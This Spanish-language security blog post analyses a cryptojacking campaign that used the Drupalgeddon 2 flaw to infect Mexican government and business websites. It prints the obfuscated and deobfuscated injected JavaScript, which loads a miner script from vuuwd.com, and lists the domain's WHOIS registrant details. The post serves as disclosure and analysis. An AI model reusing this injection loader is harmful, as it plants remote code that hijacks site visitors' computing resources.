folder Filed in Investigations
Criptojacking en sitios del Gobierno de Chihuahua, Estado de México, El Economista y HIR Casa.
Hiram Camarillo comment 0 Comments access_time 5 min read

Hace más de un mes se hizo pública una vulnerabilidad en Drupal (Software de Gestión de Contenido) llamada Drupalgeddon 2.0. (info: https://seekurity.com/services/goto/1g). Esta vulnerabilidad permite ejecutar comandos remotamente en dichas plataformas. Los criminales están aprovechando esta vulnerabilidad tomando ventaja de los administradores que durante un mes no han tenido el cuidado de actualizar sus sistemas, ya que al día de hoy aproximadamente 400 sitios están infectados.

México no queda exento a estos ataques ya que los visitantes de algunos sitios mexicanos están minando criptomonedas para alguien más…

Al ingresar a dichos sitios, la extensión MinerBlock fue la única que detectó al minero y realizó el bloqueo pertinente de su ejecución evitando que se consuman los recursos del equipo.

Estos son los código ofuscados que se encuentran en las páginas:

HIR Casa:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73’; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Instituto de Seguridad Social del Estado de México y Municipios:

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

Horloger de El Economista.

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Gobierno de Chihuahua:

Del sitio web del gobierno de Chihuahua identificamos en donde se encuentra el minero ya que tal vez fue eliminado por los administradores, sin embargo el sitio se encuentra listado dentro de los 400 sitios infectados en todo el mundo.

Al desofuscar el código, vemos que la URL a la que apuntan los mineros es vuuwd[.]com, lo cual nos indica que estos sitios son parte de la misma campaña que hasta hace unas horas se encontraba activa.

var dZ1= window["document"]["getElementsByTagName"]('\head')[0]; var ZBRnO2= window["document"]["\createElement"]('script'); ZBRnO2["type"]= 'text/javascript'; ZBRnO2["id"]='m_g_a';ZBRnO2["src"]= 'https://vuuwd.com/t.js'; dZ1["\appendChild"](ZBRnO2);

El dominio está registrado a nombre de una persona en China:

Registrant Name: Wang hang

Registrant Organization:

Registrant Street: China

Registrant City: Hong Kong

Registrant State/Province: HK

Registrant Postal Code: 999077

Registrant Country: CN

Registrant Phone: +852.95672581

Registrant Email: goodlook610@foxmail.com

Espero hayan disfrutado del post!

¡Su atención por favor!
¿Estás construyendo un sitio web? ¿Ya tienes uno? ¿Te preocupa su seguridad? ¡Piénsalo dos veces antes de lanzarlo públicamente y déjanos proteger tu negocio!

(Visited 28 times, 1 visits today)
Total Page Visits: 3683 - Today Page Visits: 6

El Economista Gobierno Chihuahua Gobierno del Estado de México Gobierno México HIR Casa issemym

Leave a Reply

Your email address will not be published. Required fields are marked *

Cancel Post Comment

Translate this blog
Scroll Up